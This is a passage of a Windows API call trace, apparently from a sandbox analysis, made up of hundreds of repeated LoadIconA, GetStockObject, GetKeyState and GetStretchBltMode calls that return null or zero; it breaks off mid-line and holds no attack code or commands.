[0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.115] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.116] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.117] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.118] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.119] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.120] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.121] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.122] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.123] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.124] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.124] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.216] GetKeyState (nVirtKey=1) returned 0 [0063.216] GetStretchBltMode (hdc=0x1) returned 0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetStockObject (i=789644) returned 0x0 [0063.216] GetKeyState (nVirtKey=1) returned 0 [0063.217] GetStretchBltMode (hdc=0x1) returned 0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetKeyState (nVirtKey=1) returned 0 [0063.217] GetStretchBltMode (hdc=0x1) returned 0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.217] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetKeyState (nVirtKey=1) returned 0 [0063.218] GetStretchBltMode (hdc=0x1) returned 0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetKeyState (nVirtKey=1) returned 0 [0063.218] GetStretchBltMode (hdc=0x1) returned 0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.218] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetKeyState (nVirtKey=1) returned 0 [0063.219] GetStretchBltMode (hdc=0x1) returned 0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetKeyState (nVirtKey=1) returned 0 [0063.219] GetStretchBltMode (hdc=0x1) returned 0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.219] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetKeyState (nVirtKey=1) returned 0 [0063.220] GetStretchBltMode (hdc=0x1) returned 0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetStockObject (i=789644) returned 0x0 [0063.220] GetKeyState (nVirtKey=1) returned 0 [0063.220] GetStretchBltMode (hdc=0x1) returned 0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetKeyState (nVirtKey=1) returned 0 [0063.221] GetStretchBltMode (hdc=0x1) returned 0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.221] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetKeyState (nVirtKey=1) returned 0 [0063.222] GetStretchBltMode (hdc=0x1) returned 0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetKeyState (nVirtKey=1) returned 0 [0063.222] GetStretchBltMode (hdc=0x1) returned 0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.222] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetKeyState (nVirtKey=1) returned 0 [0063.223] GetStretchBltMode (hdc=0x1) returned 0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetKeyState (nVirtKey=1) returned 0 [0063.223] GetStretchBltMode (hdc=0x1) returned 0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.223] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetStockObject (i=789644) returned 0x0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.224] GetKeyState (nVirtKey=1) returned 0 [0063.224] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.225] GetStretchBltMode (hdc=0x1) returned 0 [0063.225] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 